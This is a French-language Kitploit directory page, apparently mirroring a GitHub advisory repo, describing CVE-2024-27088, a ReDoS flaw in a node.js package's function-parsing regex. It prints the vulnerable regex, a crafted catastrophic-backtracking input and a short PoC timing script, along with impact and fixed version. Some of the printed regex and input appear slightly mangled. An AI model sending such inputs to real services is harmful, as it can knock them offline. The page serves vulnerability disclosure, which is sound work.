Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-27088 — redos | Kitploit
Outils/GitHubGitHub/200101whoami/cve-2024-27088
Analyse StatiqueAnalyse des VulnérabilitésAnalyse de CodeArticles et RechercheApprentissage et Éducation
GitHub200101whoami/cve-2024-27088

CVE-2024-27088

redos

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-27088

Aperçu de la vulnérabilité

  • CVE-2024-27088
  • 26 février 2024
  • ReDoS dans un paquet node.js
  • Dans le cadre du projet rebob

Description de la vulnérabilité

github advisories

root@kitploit:~
/^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/

Cette vulnérabilité peut être exploitée lorsqu'il y a un déséquilibre dans les parenthèses, ce qui entraîne un backtracking excessif et augmente considérablement la charge CPU et le temps de traitement. Cette vulnérabilité peut être déclenchée en utilisant l'entrée suivante :

'function{' + 'n'.repeat(31) + '){

Voici un code PoC simple pour démontrer le problème :

root@kitploit:~
const protocolre = /^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/;

const startTime = Date.now();
const maliciousInput = 'function{' + 'n'.repeat(31) + '){'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

Impact

Passer des fonctions avec des noms très longs ou des noms d'arguments par défaut complexes dans function#copy ou function#toStringTokens peut entraîner un blocage du script.

Correctifs Corrigé avec 3551cdd et a52e957 Publié avec la version 0.10.63

Solutions de contournement Aucune véritable solution de contournement en dehors du fait de s'abstenir d'utiliser les utilitaires ci-dessus.

issue target package

Télécharger l’outil